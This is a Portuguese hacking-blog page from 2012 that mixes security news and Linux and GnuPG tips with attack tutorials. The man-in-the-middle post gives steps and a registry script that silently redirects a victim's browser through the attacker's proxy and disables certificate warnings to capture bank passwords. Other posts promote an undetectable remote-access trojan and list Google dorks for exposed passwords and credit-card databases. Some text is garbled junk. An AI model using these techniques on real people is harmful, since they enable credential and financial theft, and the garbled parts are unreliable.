Criando um Exploit hack

Criando um simples Exploit hack usando Metasploit para Windows 7

Compre Produtos com mais de 80% de DESCONTO!

Confira! Agora você poderá comprar produtos por preços totalmente acessível! Só Aqui no HC Host!

domingo, 7 de outubro de 2012

Servidor da Abin é preso por espionar a própria agência


Um servidor da Agência Brasileira de Inteligência (Abin), identificado pelas iniciais WTN, foi preso em flagrante pela Polícia Federal por espionagem no próprio órgão. O caso expôs a fragilidade na proteção a dados em áreas sensíveis do Estado e acendeu a luz amarela no Palácio do Planalto, que quer um esclarecimento rápido da extensão dos danos e dados obtidos pelo espião. Órgão de assessoramento para tomada de decisões da Presidência da Republica, a Abin é vinculada ao Gabinete da Segurança Institucional (GSI).

A prisão do araponga ocorreu na última sexta-feira a pedido da própria Abin, que havia verificado "fluxo atípico de dados em uma estação de trabalho" em sua sede, segundo nota divulgada pelo GSI. No momento da prisão, o espião preso já havia conseguido hackear 238 senhas de agentes envolvidos em investigações estratégicas, conforme notícia publicada nesta quinta no jornal Correio Braziliense. "As atividades desenvolvidas nessa estação foram acompanhadas, identificando-se diversas ações vetadas por regulamentos e normas legais", diz a nota.

Por se tratar de assunto sensível e não se conhecer a extensão dos dados violados, ou para quem estavam sendo vazados, o caso está sendo tratado sigilosamente, por ordem da 10ª Vara da Justiça Federal. Mas o segredo excessivo serviu para alimentar versões conflitantes. O ministro chefe do GSI, general José Elito Carvalho, cobrou rigor nas investigações.

WTN tem 35 anos e seria lotado na área de informática da Abin. Ele responde a inquérito criminal por violação de sigilo, cuja pena é de até dois anos de reclusão e a processo administrativo, que pode resultar em demissão do cargo. A prisão ocorreu na tarde da última sexta-feira, quando agentes da PF infiltrados na repartição deram flagrante no servidor no momento em que ele acessava dados de áreas em que não tinha permissão. O espião pagou fiança de 3,5 salários mínimos e foi libertado no sábado para responder a processo em liberdade.

A Abin tem entre suas missões promover e proteger informações consideradas estratégicas para o Brasil, por meio do Programa Nacional de Proteção do Conhecimento Sensível. Cabe ao órgão ainda investigar e prevenir, com ações de inteligência e contrainteligência, potenciais atentados contra a presidente da República e instalações sensíveis à economia e a infraestrutura do país.

O GSI assegurou que a agência realiza, sistematicamente, a monitoração de todos seus sistemas informatizados e redes institucionais. Essa rotina tem por objetivo "garantir a segurança e detectar eventuais falhas operacionais ou atividades não autorizadas", explica a nota. A PF informou que mandou uma equipe à sede da Abin, por requisição da própria agência e verificou "um flagrante de possível violação de sigilo funcional".

Vulnerabilidades no software da urna eletrônica brasileira

 Um grupo de quatro especialistas da Universidade de Brasília (UnB) encontrou uma lacuna na segurança das urnas eletrônicas, em teste promovido pelo Tribunal Superior Eleitoral (TSE). Os pesquisadores do Centro de Informática e do Departamento de Computação da UnB conseguiram decifrar códigos da urna e identificaram a ordem dos votos registrados no equipamento. Se o mesmo grupo tivesse em mãos os nomes dos eleitores que votaram na urna, em ordem cronológica, poderia indicar quem votou em que candidato. 

Confira a baixo mais detalhes.

VIDEO


PDF




Hackers conseguem invadir urna eletrônica


Brasília – Um grupo de quatro especialistas da Universidade de Brasília (UnB) encontrou uma lacuna na segurança das urnas eletrônicas, em teste promovido pelo Tribunal Superior Eleitoral (TSE). Os pesquisadores do Centro de Informática e do Departamento de Computação da UnB conseguiram decifrar códigos da urna e identificaram a ordem dos votos registrados no equipamento. Se o mesmo grupo tivesse em mãos os nomes dos eleitores que votaram na urna, em ordem cronológica, poderia indicar quem votou em que candidato.


Com a descoberta, o TSE foi obrigado a criar novos obstáculos para impedir que os dados da urna possam ser descriptografados. O mesmo grupo da UnB terá uma nova chance para desvendar o mistério. Para alcançar seu objetivo, os profissionais puderam visualizar por um curto período de tempo o código-fonte – a tradução do algoritmo -, que fica guardado no cofre do tribunal. O chefe do grupo, Diego de Freitas Aranha, professor do Departamento de Computação da UnB, disse que é impossível saber se conseguiriam quebrar o segredo caso não tivessem acesso à informação privilegiada.

- Isso facilitou a execução do teste. Nós conseguimos recuperar os votos em ordem, numa totalidade de 99,99%. O que isso significa? De posse dos votos, em ordem, e de uma lista de eleitores que precisa ser obtida de uma outra forma, em ordem, é possível você fazer a correspondência. Esse é o resultado do nosso teste – explicou Aranha.

A urna investigada estava carregada com a média de votos digitados, por equipamento, nas eleições gerais de 2010. O mesmo grupo demonstrou ao TSE como desembaralhou os votos e foi obrigado a apontar sugestões para fechar a porta do sistema.

- Faz parte do protocolo do teste os investigadores sugerirem alterações, correções, reparos. Se nossas sugestões forem adotadas, não deveria haver risco – completou o especialista.

O perito da Polícia Federal (PF) Thiago Cavalcante, que também participou do teste, reforçou que a ação dos colegas apontou uma vulnerabilidade no sistema. Mas pondera que o processo eleitoral tem uma série de etapas não relacionadas entre si, o que dificultaria, em tese, a quebra do sigilo.

- Por isso, o teste é bem-vindo. Justamente para corrigir problemas antes da eleição – afirmou o perito da PF.

Além da quebra do sigilo dos votos, outros grupos de hackers trabalharam, no mesmo teste, para fraudar as eleições, mas nenhum obteve êxito. Este foi o segundo “ataque” com especialistas em computação, que transformaram a urna em alvo eletrônico. Em 2009, outro pesquisador, com um rádio de pilha a cinco centímetros de distância do equipamento, venceu a disputa promovida pelo TSE. Ele distinguiu as ondas eletromagnéticas dos números 1 e 2. Um dos técnicos que supervisionaram o teste admitiu que os vencedores deste ano foram muito além.

O secretário de Tecnologia da Informação do TSE, Giuseppe Janino, informou que a descoberta, por si, garantiu o sucesso do teste, que durou seis dias. Ele informou que já providenciou o “reforço da rotina do algoritmo”, aumentando a complexidade da operação.

- A urna continua segura. Esta é uma iniciativa inédita no mundo, e o teste demonstra a competência da equipe. Assim que os ajustes estiverem concluídos, esse mesmo grupo será chamado para repetir o teste – assegurou Janino.

sábado, 6 de outubro de 2012

Como os eventos esportivos que o Brasil vai recepcionar impactam o setor de TI




A Copa do Mundo de 2014, que será sediada pelo Brasil, está sendo vista como um momento sublime e imperdível para grande maioria da população brasileira. Os jogos Olímpicos de 2016, igualmente sediados pelo Brasil, também têm seu apelo, mas não chega a ter a expectativa de parar o País, assim como o evento de futebol. Mas é certo que os dois eventos tem tudo a ver com nossas raízes, que desfruta ao máximo suas festas tradicionais como o Carnaval e outras mais regionais. Nestes momentos, os brasileiros exaltam seu lado patriota com muita intensidade.

Além da festa, estes dois grandes acontecimentos trarão ao País grandes oportunidades de negócios e um ‘boom’ em vários setores, considerando a movimentação tanto do governo quanto da iniciativa privada. Já estamos vivenciando a construção ou reforma de grandes estádios, que devem se tornar verdadeiras ‘arenas’, nas quais poderemos usufruir deste espaço – pós Copa e Olimpíadas – em eventos de entretenimento, como shows, formaturas, encontros religiosos, entre outros.

Também veremos a indústria hoteleira aprimorando sua infraestrutura para melhorar o atendimento a seus clientes; da mesma forma, teremos obras em aeroportos e investimento em Telecom, para que as emissoras de TV façam a comunicação em geral, satisfazendo tanto os brasileiros quanto o resto do mundo com excelentes transmissões. Estes investimentos criarão condições de trabalho para todos os profissionais envolvidos nos eventos.

Ainda haverá uma avalanche de verbas de publicidade aplicadas em várias ações, talvez, sem precedentes até hoje no País. O setor de TI acompanhará toda esta movimentação, pois em qualquer um destes locais existe a necessidade de integração de tecnologias de ponta.

Recentemente li um estudo, realizado pela Associação Brasileira de Empresas de TIC (Brasscom), que previa investimentos para a realização da Copa do Mundo e da Olimpíada na ordem de R$ 57 bilhões, sendo que somente a área de TIC (Tecnologias da Informação e Comunicação) responderia por 10% do total, ou R$ 5,7 bilhões. Os valores correspondem à infraestrutura (estádios, mobilidade urbana, aeroportos e portos) das cidades-sede e aos gastos com a melhoria dos serviços (TIC, energia, hotelaria, saúde e segurança).

O investimento de R$ 5,7 bilhões está relacionado com as exigências da Fifa em relação à infraestrutura de TIC, como redes entre todos os locais, suporte a dados e áudio, serviços de voz, vídeo, streaming (transmissão de informação multimídia) e gestão dos sistemas e suporte. Isto tudo somente nas dependências diretas do evento, ou seja, sem considerar os hotéis, restaurantes e empresas de médio porte de outros segmentos que também estarão envolvidos nos eventos.

Com todas estas oportunidades, a cadeia de fornecimento de tecnologia – fabricante, distribuidor e revenda – terá que se preparar para atender às demandas, auxiliando ainda na criação de projetos tecnológicos mais adequados à cada situação. Os profissionais do setor precisam considerar nestes projetos tudo que pode ser oferecido depois do evento. Este é um ponto de grande relevância para o sucesso contínuo dos investimentos.

No meio de todos estes processos, ainda estamos vendo muitas obras atrasadas, e provavelmente teremos problemas como prazos de entrega encurtados, levando ao aumento de custos.

Diante do cenário, nosso grande desafio, enquanto fornecedores de tecnologia, será contribuir para que tudo esteja pronto nos prazos estabelecidos e, o que é mais importante, contribuir para a oferta de projetos inovadores, que permitam a estes locais serem melhores aproveitados após o evento, garantindo assim o retorno de seu investimento e os recursos necessários para sua manutenção.

Com a ajuda de todos, não corremos o risco de, lá para frente, vermos todo um esforço e investimento jogados no lixo, pelo mau aproveitamento das obras. A fase que compete ao mercado de TI para estes grandes eventos está se aproximando. Que tal nos prepararmos com a oferta de soluções de ponta para o setor e com a capacitação dos nossos profissionais? Com todo potencial que nós brasileiros temos, criativo ou de execução, esta Copa promete!

Fonte : profissionaisti

Trabalhando com Arquivos PDF no Linux


Nesse artigo iremos dar algumas dicas de como se trabalhar com documentos PDF no Linux, veremos como criar documentos PDF editáveis, como editar qualquer documento em PDF e outras dicas interessantes.

O formato de arquivos PDF (Portable Document Format) foi desenvolvido pela Adobe Systems em 1993 com o objetivo de representar documentos de maneira independente do aplicativo, do hardware e do sistema operacional usados para criá-los. O PDF é um padrão aberto e qualquer pessoa pode escrever aplicativos que leiam ou escrevam neste padrão.

Existem diversas aplicações disponíveis por aí para criação, edição e leitura de documentos no formato PDF. As aplicações mais conhecidas do público em geral são as para criação e leitura de documentos em PDF, já quando falamos em edição de documentos PDF  nem todos conhecem as formas de se fazer isso.


Como criar documentos PDF editáveis no Linux

A maioria dos usuários Linux utiliza ou já utilizou a suíte LibreOffice para criação de documentos. Para os que são novos no Linux o LibreOffice é o similar do Office da Microsoft, só que o LibreOffice é de graça, é claro

Quando criamos algum documento no LibreOffice podemos exporta-lo no formato PDF de forma bem simples, basta ir na guia “Arquivo -> Exportar como PDF…“. E para torná-lo editável basta marcar a opção “Tornar esse PDF facilmente editável no LibreOffice”.


Em seguida, basta clicar em Exportar e pronto. Da próxima vez que você quiser editar esse documento, diretamente no PDF, basta abri-lo com o LibreOffice.

Um detalhe: Quando você abrir o PDF com o LibreOffice, caso apareça um monte de caractares malucos é porque está faltando um pacote chamado libreoffice-pdfimport. Basta instalar esse pacote, fechar e abrir o LibreOffice que tudo deve funcionar.


$ sudo apt-get install libreoffice-pdfimport




Editando outros documentos PDF

Bem, quase todo mundo já se deparou com um situação parecida – você recebeu ou baixou um arquivo PDF que não é editável, mas você precisa editar esse arquivo. Para isso podemos utilizar um aplicativo muito interessante, chamado Master PDF Editor.

Para os usuários do Ubuntu você pode obter esse aplicativo diretamente através da Central de Gerenciamento de Software do Ubuntu, basta fazer uma busca pelo aplicativo Master PDF Editor. Você verá que não tem a opção de instalar, somente o botão de Comprar. No entanto, o preço desse aplicativo é 0.00. Então é só clicar no botão de Comprar, fazer o login com seu usuário do Ubuntu Single Sing On (caso não tenha uma, basta se registrar) e o processo de instalação dará início.


Para os que não são usuários do Ubuntu é possível fazer o download do Master PDF Editor nesse link.

Assim que o aplicativo for instalado você poderá abrir os documentos PDF e editá-los da maneira que desejar, sendo possível copiar, colar, recortar, excluir ou inserir qualquer coisa no seu PDF, seja textos ou imagens.




Juntando Arquivos PDF no Linux

Como uma última dica, vamos tratar de outro problema que muitos de nós já enfrentamos… tenho dois arquivos PDF e quero juntar os dois, formando um único arquivo.

Isso no Linux é extremamente fácil com uso do aplicativo pdftk. Basta instalar esse aplicativo:

$ sudo apt-get install pdftk



Depois de instalado basta utilizar da seguinte forma, veja abaixo um exemplo para juntar dois arquivos PDF no Linux (teste1.pdf e teste2.pdf) formando um novo arquivo chamado juntado.pdf. No exemplo, os arquivos estão localizados na pasta /home/docs.


pdftk /home/docs/teste1.pdf /home/docs/teste2.pdf cat output /home/docs/juntado.pdf
Se quiser ver outras opções do uso do pdftk basta consultar seu manual (man pdftk).




sexta-feira, 28 de setembro de 2012

5 Passos para se invadir uma empresa


ndando no youtube eu achei um bom “tutorial” de como invadir uma empresa em 5 passos.

É tão simples quanto roubar doce de uma criança, basta ter criatividade, uma mente perversa e um back track 5 R3 na mão.


Ferramentas complementares ao vídeo
O que poderá te ajudar também são:
BlueBanana, apesar do nome ser bobo ele é uma ferramenta e tanto por conta de ser INDETECTÁVEL aos anti-vírus atuais.
Sem contar que é um simples arquivo .JAR o que facilita na hora de mandar para alguém já que o facebook nem o msn barra arquivos em java.

wswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswswsa

O tweet que aparece aos 0:50 não tem nada a ver com o assunto, o autor me questionou com medo que fosse relacionado ao post. Ele não tem nada com o conteúdo do post eu apenas sigo(seguia) o profile dele.

Já está dando para notar o poder que  java está no mundo da segurança.

Outra ferramenta que explora vulnerabilidade nova em java é o Black Hole Exploit Kit que está sendo comercializado para fins de crime, ao invadir um site o black hole é instalado e gera um código malicioso em java explorando a falha CVE-2012-4681, nada melhor para explicar que um post muito bem detalhado como este e um vídeo para mostrar como ele atinge os computadores.

domingo, 16 de setembro de 2012

Microsoft descobre que PCs já saem de fábrica com vírus

Em meio a uma investigação sobre pirataria, a Microsoftdescobriu algo preocupante: computadores não só saem de fábrica com cópias falsificadas do Windowscomo, também, com vírus.

Pesquisadores da companhia encontraram o problema na China ao comprarem 20 máquinas novas em varejistas diferentes. Todas elas tinham versões piratas do sistema operacional e quatro delas vieram com vírus.

Um desses vírus, chamado Nitol, já foi visto também nos Estados Unidos, Rússia, Austrália e Alemanha, segundo o 
The Guardian. Todos esses computadores se tornam parte de uma botnet.

O caso foi revelado pela 
Microsoft na quinta-feira, 13, em uma corte federal em Virgínia, onde a companhia encabeça uma batalha contra o empresário chinês Peng Yong, dono de um domínio considerado como responsável pela maior central de atividades ilegais na internet, o 3322.org. Há mais de 500 tipos de malwares por lá.

A empresa foi à Justiça explicar a ligação entre Yong e o vírus, descoberta em uma investigação sobre pirataria iniciada em agosto de 2011 - foi quando as 20 máquinas foram compradas. Dentre todos os problemas, o que mais chamou a atenção dos pesquisadores foi a atividade do Nitol, que já veio ativo em um dos PCs.

"Assim que ligamos este computador, por sua conta própria e sem qualquer intervenção nossa, ele começou a pesquisar na internet, tentando se conectar com um computador desconhecido", contou em um documento Patrick Stratton, um gerente sênior da 
Microsoft para crimes digitais.

Ele e um colega perceberam que o Nitol é altamente contagioso: ao conectar um pendrive à máquina infectada, ele automaticamente foi contaminado e, quando ligado a outro PC, ele passou o vírus adiante.

Milhares de exemplos do vírus foram examinados, com diversas variáveis, e em todos os casos havia ligação com servidores associados ao 3322.org. Em 2008, a Kaspersky afirmou que 40% de todos os malwers do mundo tinham alguma relação com o domínio; no ano seguinte, a Zscaler reportou que a taxa era de 17%.


sábado, 15 de setembro de 2012

teste


quarta-feira, 12 de setembro de 2012

A técnica Man-in-the-Middle

 O que aconteceu, se eu tomei todos os cuidados antes de entrar com a minha senha!? ...
Onde estava o erro afinal?
Será que havia um HOMEM-NO-MEIO?

A Técnica

Apesar de ser uma técnica relativamente fácil de ser feita, não deixa de ser uma técnica super poderosa. Muitos crackers à usam para fins maléficos como roubar senhas de clientes de bancos, mas a mesma pode ser usada por hackers para descobrir senhas de e-mails como por exemplo o Yahoo! Ou Hotmail que se tentássemos captura-las por técnicas de sniffing não obteríamos nada legível. Neste artigo irei mostrar como os crackers capturam senhas de bancos on-line para demonstrar que os famosos tecladinhos virtuais são facilmente burlados apesar de toda a sua fama de seguro. Nenhuma forma de proteção existente nos dias de hoje é capaz de parar esta técnica.
Espero que nenhum de nossos leitores use o conhecimento aqui obtido para causar prejuízos a terceiros, uma vez que escrevi este artigo apenas para fins didáticos e não poderá ser usado como forma de incentivo a criminalidade. O que garante que eu possa passar este conhecimento para você sem está cometendo um crime é o artigo 5º da Constituição Federal que nos garante a Liberdade de Expressão.


Como funciona?

Veja a imagem a seguir, esta é uma representação de uma conexão normal, sem interceptações, e funciona de modo que o cliente passa os dados criptografados para o servidor e vice-versa, tornando assim impossível o uso de técnicas de sniffing para a capturados dados trocados entre o cliente e o servidor.


Abaixo segue uma representação de uma conexão interceptada, (usando a técnica Man-in-The-Middle), e funciona de modo que o hacker engana o cliente e o servidor. Engana o cliente se fazendo passar por um simples servidor de proxy, e engana o servidor se passando pelo próprio cliente, desta forma os dados chegam até o hacker em texto puro, pois os dois pensam que o hacker é uma fonte confiável.



Conhecendo o Anchiles

O Achiles nada mais é do que um simples servidor de proxy, que se usado de forma incorreta pode servir como uma poderosa ferramenta hacker, que nas mão de uma pessoa mal intencionada pode causar grandes prejuízos, uma verdadeira faca de dois gumes. Você pode usar outro programa semelhante mais vamos usar este no exemplo.

Configurando



Em seguida clique no botão com um sinal de play no achiles para iniciar o servidor de proxy, para confirmar se o Achiles realmente iniciou o servidor verifique na barra de status do programa se ele está como running como na figura abaixo.


Agora abra as janelas do cliente e do servidor, para abrir a janela do cliente basta clicar no botão do ícone C e para a abrir a janela do servidor basta clicar na janela com o ícone S e aogra o Achiles já está configurado vamos agora configurar a máquina alvo.

Preparando o computador alvo

Um dos grandes inconvenientes desta técnica é que precisamos ter acesso físico à máquina do alvo para fazermos algumas configurações para que a técnica dê certo ou então poderíamos escrever um controle ActiveX que quando o alvo entrasse em uma página contendo este controle malicioso feito pelo hacker, estas alterações fossem feitas no computador do alvo automaticamente, mas isto é uma área muito avançada e será estudada em um outro artigo, talvez.
Para preparar o computador do alvo siga os passos:

Etapa 1
Abra o Internet Explorer do alvo, clique no menu Ferramentas / Opções de Internet... E em seguida na aba Conexões e depois em Configurações da LAN.

Etapa 2
Tomando como exemplo a figura abaixo, na máquina do alvo marque a opção de número 01 e em seguida digite o seu IP no campo número 02 (você pode ver qual é o seu IP acessando http://www.ip-adress.com) e no campo de número 03 digite a porta que você especificou no achiles quando o configurava. Agora clique em OK e vá para a aba Avançadas.


Etapa 3

Na aba Avançadas role a drop-down até encontrar as opções no grupo Segurança:
Avisar quando o certificado do site for inválido
Avisar se os formulários submentidos estiverem sendo redirecionados
Pronto! Agora é só esperar que o alvo acesse site e digite seus dados (login e senha), e logo aparecerá na janela de Cliente do Achiles. Na janela do servidor você poderá ver as respostas que o servidor está dando para o cliente, use com cuidado!

Script automatizado

Vamos escrever um script que fará todo o trabalho pesado pra você, ele fará toda a configuração mostrada acima, automaticamente basta apenas executá-lo e pronto o computador da vítima já está preparado para a ser interceptado.
Abra o notepad e digite o seguinte código, (sem a numeração das linhas):

Windows Registry Editor Version 6.01
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000001
"ProxyServer"="127.0.0.1:8080"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnonBadCertRecving"=dword:00000000
"WarnOnPostRedirect"=dword:00000000

Em seguida salve o arquivo com a extensão .reg.

Como configurar o script

Para configurar este script é bastante simples basta você editar a linha de número 4 ("ProxyServer"="127.0.0.1:8080") no código do script colocando lá informações sobre o IP e porta do servidor de proxy que no caso é o IP do seu computador. No lugar de 127.0.0.1 você deverá digitar o seu IP e no lugar de 8080 você deverá digitar a porta pela qual o servidor do proxy vai se comunicar com o cliente, ficando assim "ProxyServer"="ip.do.seu.micro:porta".
O script está pronto! Agora é só você fazer com que o alvo o abra ou em um rápido acesso físico a máquina do mesmo você poderá executá-lo já que sua execução é bastante rápida.

Proteja-se

Se você perceber a internet extremamente lenta ou se for emitido algum aviso sobre o certificado de segurança inválido, quando você acessar alguma página segura como a página de um banco, desconfie! Pois você pode estar sendo mais uma vítima desta poderosa técnica. Crie o habito de checar as configurações de proxy (Ferramentas>Opções de Internet...) toda vez que for visitar sites de bancos ou passar informações sigilosas via internet, assim você ficará bem mais protegido.
Pode existir novas técnicas que aplicam o golpe Man-in-the-Maddle e softwares especificos para o feito, então sempre se mantenha atualizado sobre isto.

FONTE : securityhacker

quarta-feira, 22 de agosto de 2012


sexta-feira, 17 de agosto de 2012

Tecnica de Footprinting na Web


Google!

Um método de se fazer footprinting e que pode ser bem eficiente é utilizar páginas de busca na Internet, em especial o Google. Ele possui um recurso poderoso de obtenção e procura de informações, baseado no PageRank. Através do “GoogleBot”, um script automatizado, ele varre toda a rede, atravessando todos os possíveis links e catalogando as páginas que descobriu, além de remover de seu cadastro algum que possa ter deixado de existir. Enfim, o Google é uma ferramenta de busca que não requer interação humana (como cadastro manual de de sites). Com um sistema tão potente, não fica difícil imaginar porque hoje é uma das melhores ferramentas de footprinting existente e claro, a mais utilizada com essa finalidade.

Considerações Importantes : 

O Google não diferencia letras maiúsculas de minúsculas.

O máximo de palavras-chave para a pesquisa são 10.

É permitida a pesquisa com wildcards (asteriscos). Assim, você especifica só uma parte do que quer encontrar e vê diversas opções. Ex.: universidade estadual de minas, universidade federal de minas, universidade especial de minas etc.

A ordem das palavras faz diferença. Pesquisar futebol pelé e pelé futebol gera diferentes resultados.

O sinal de mais (+) funciona como operador AND eo sinal de menos (-) como operador NOT. Exemplo: quero procurar por: hackers brasileiros. Se eu colocar desse jeito no Google, ele procura por páginas que contenham cada uma das palavras. Se eu colocar +hackers +brasileiros, ele irá procurar por sites que tenham as duas palavras. Por fim se colocarmos hackers –brasileiros, ele irá procurar por todos os sites que contenham a palavra hackers, exceto os que contêm a palavra brasileiros.

Alguns comandos do Google

→ Intext: Procura informação no texto das páginas.

→ Inurl: Procura informação em links. Ex: http://www.invasao.com.br

→ Inanchor: Procura informção no texto de um link. Ex: download (palavra muito comum em textos de links).

→ Intitle: Procura informação no título das páginas.

→ Cache: Mostra o cache do Google de determinada página.

→ Site: Especifica em quais sites a busca será feita. Exemplo: com.br (procura só em sites comerciais no Brasil), gov.br (procurar só em sites do governo do Brasil), uol.com.br (procurar apenas no site UOL).

→ Filetype: Especifica o tipo de aquivo que quer encontrar. Você precisa colocar apenas a extensão. Ex: pdf, doc, swf, xls, ini, pwd, mdb.

Você pode combinar esses comandos. Exemplo: quero pesquisar por sites que contenham a palavra segurança no título da página e que sejam somente no Brasil.

+intitle:segurança +site:br

Vamos pesquisar agora por sites não indexados. São locais nos quais não se colocou um index.htm ou página principal. Quando você os acessa, esses sites simplesmente lhe mostram uma lista dos arquivos que estão ali. Além disso, vamos tentar conseguir uma página de site não indexado que esteja no diretório admin.

+inurl:admin +”Index of /admin”

Outra pesquisa muito utilizada pelos famosos Script Kiddies é para obter e descobrir senhas. A imaginação ajuda muito nesse ponto. Um exemplo interessante é a descoberta de arquivos INI de configuração, no qual alguns deles contêm até senhas com um fraco sistema de criptografia. É o caso do WS_FTP. Na pesquisa a seguir, especificamos o tipo de arquivo (filetype) para INI e mandamos bala.

+filetype:ini +WS_FTP

E , por último, quero demostrar o quanto pode ser perigoso o Google quando utilizado por mãos erradas (mais ainda do que mostramos até agora). Vamos tentar procurar por bancos de dados do Microsoft Access que possuem números de cartão de crédito Visa, especificando novamente o filetype:

+filetype:MDB +visa

Saiba o que é Footprinting


Footprinting é a arte de obter informações sobre um sistema alvo usando táticas “seguras”, sem perigo de detecção, e que pode dar muitas informações sobre ele. Tais como visitar o site da empresa em que se quer invadir e ler as seções para ver se encontra algo de interessante.
O footprinting é o nome dado ao ato de realizar comandos remotos ao alvo, ou sistema remoto, com objetivo de recolher informações tais como, qual Sistema Operacional usa, qual portas ficam abertas para entrada, qual sistema de defesa usa, entre outros.E para realizar o footprinting, você deve usar todas as ferramentas de comandos remotos que seu SO disponibiliza, os sistemas UNIX possuem muitos, os win3.11, win95, win98, winME, possuem poucos, o winNT e win2000 possuem um service que podem ser instalado separadamente, que possue ótimas ferramentas para realizar footprinting.Existe duas ótimas ferramentas que ajudam muito a realizar o footprinting em SO linux, que são o SATAN e o nmap. O SATAN é uma ferramenta que foi construída para axiliar na análise de sistemas remotos, que pode ser usado tanto para previnir quando para ajudar a atacar, pois ajuda a fazer o footprinting. Bem, o que o SATAN faz é simplesmente executar vários (pra não dizer quase todos) comandos remotos que o linux tem, no sistema alvo e depois mostrar o resultado, assim facilida muito, em vés da pessoa ter que ficar dando whois, finguer, ping, tracert, entre outros, executa o SATAN no host alvo e pronto. O nmap, é simplesmente uma ferramenta indispensável para quem faz footprinting através de sistamas linux, ele é um super scan, capaz de identificar o SO do host, e conseguir outros dados importantíssimos. Mais informações sobre o sistema podem ser obtidas através de uma técnica muito boa que é a engenharia social, que é apenas usufruir de talentos como mentira e cara-de-pau, para conseguir informações, tipo, você pode revirar o lixo da empresa a ser invadida, ou criar mentiras, mandar e-mails falsos se fazendo passar por alguém importante e pedindo dados do sistema, (use algum sistema de anonimato), e tentar descobrir algo, isso não se ensina, cada um aprende sozinho.


Whois

O Whois é excelente para obtermos informações sobre sites. Bancos de dados como o Internic (www.internic.org) mantêm informações interessantes sobre os domínios, tais como nome do dono, endereço e telefone. No Brasil, o orgão responsável por essa tarefa é a Fapesp e podem ser feitas pesquisas no seguinte endereço: http://www.registro.br/.

Análise de homepages

Consiste em entrar no site, ler tudo quanto é página, homepages pessoais de funcionários (se for uma empresa), absolutamente tudo. Parece incrível, mas muitos lugares mostram até configurações da rede em suas páginas. O código em html também deve ser analisado a procura de comentários. Muitos deles podem ser extremamente úteis. Cheque todos os links, observe os endereços em que as páginas se posicionam. Já dá para começarmos o montar um
mapas da rede (antes de fazer um ataque direto scanneando mais tarde).

Pesquisa geral

Use ferramentas de busca como o Altavista para descobrir outras páginas com o nome do domínio atacado. Pesquise em jornais notícias em jornais e revistas sobre o “inimigo”, tais como se ele já foi atacado, se já sofreu algum tipo de invasão, etc. Tente conhecer pessoas que trabalham lá, ter uma noção de quantos empregados existem tomando conta daquele servidor. Enfim, quanto mais você puder descobrir na pesquisa geral, mas fácil o seu trabalho ficará depois.

Primeiros passos com o GnuPG - Ferramenta para criptografar dados e criar assinaturas digitais.

O que é o GnuPG?

O GnuPG (GNU Privacy Guard) é uma ferramenta livre e gratuita para comunicação e armazenamento seguro de dados, que pode ser usado pela linha de comando para criptografar dados e criar assinaturas digitais.


O GnuPG utiliza um método de criptografia conhecido como chave assimétrica, em que duas chaves são criadas: a primeira, pública, serve para que qualquer pessoa codifique mensagens e arquivos de modo que apenas você possa decodificar; a segunda, privada, deve ser mantida em absoluto sigilo e serve para que você decodifique mensagens term papers criptografadas com sua chave pública equivalente. Por isso, esse método também é conhecido como criptografia de chave pública.



Instalando o GnuPG


Aqui o gpg ja veio instalado mais ele pode ser encontrado no repositorio de programas do ubuntu e para instalar basta digitar no terminal



As chaves públicas e privadas são armazenadas nos arquivos pubring.gpg e secring.gpg respectivamente, dentro do subdiretório ~/.gnupg de sua pasta pessoal ($HOME). Convém tirar um cópia de segurança desses arquivos, para isso basta copiar os arquivos citados acima em uma mídia segura (pen-drive, CD-ROM, etc).





# apt-get install gnupg  
Após instalar o gnupg, execute o comando gpg para criar o diretório ~/.gnupg que armazenará as chaves pública e privada.



gpg  

Gerando suas chaves GnuPG


Para gerar um par de chaves pessoais use o comando:





gpg --gen-key  






gpg 
(GnuPG1.4.11Copyright (C2010 Free Software FoundationIncThis is free softwareyou are free to change and redistribute itThere is NO WARRANTYto the extent permitted by lawPor favor selecione o tipo de chave desejado
   (
1RSA e RSA (padrão
   (
2DSA e Elgamal 
   
(3DSA (apenas assinatura
   (
4RSA (apenas assinarSua opção1  


Nesse tutorial iremos escolher a opção 1 mais isso vai de acordo com a necessidade de cada pessoa





RSA chaves podem ter o seu comprimento entre 1024 e 4096 bits
Que tamanho de chave você quer? (20482048 
 
Aqui você dever escolher qual o comprimento das chaves que varia de 1024 para 4096 sendo que o padrão é 2048

Depois de feito isso irar aparecer a opção de por quanto tempo as chaves serão validas





Por favor especifique por quanto tempo a chave deve ser válida

         
chave não expira 
      
<n>  = chave expira em n dias 
      
<n>chave expira em n semanas 
      
<n>chave expira em n meses 
      
<n>chave expira em n anos 
A chave é valida por
? (0)  
Agora escolha o período da validade de sua chave. A opção 0 (zero) é o padrão, a chave não expira. Mas caso você queira que sua chave expire depois de um certo período, informe um número positivo que terá o valor de dias. Esse número pode ser seguido das letras w (semanas), m (meses) ou y (anos). Por exemplo, "10w", "7m", "2y", "60". Obs: Após a validade, a chave será considerada inválida.




A chave é valida por
? (0
A chave não expira nunca 
Está correto 
(s/N)? s  



Depois de feito isso devemos colocar informações sobre o dono das chaves (você)


Você precisa de um identificador de usuário para identificar sua chave

programa constrói o identificador a partir 
do Nome CompletoComentário e 
Endereço Eletrônico desta forma

    
"Heinrich Heine (Der Dichter) Nome completoMMxM~ <enterEndereço de correio eletrônicommedeiros1983@hotmail.com <enterComentário: <enterVocê selecionou este identificador de usuário
    
"MMxM~ Muda (N)ome, (C)omentário, (E)ndereço ou (O)k/(S)airo  
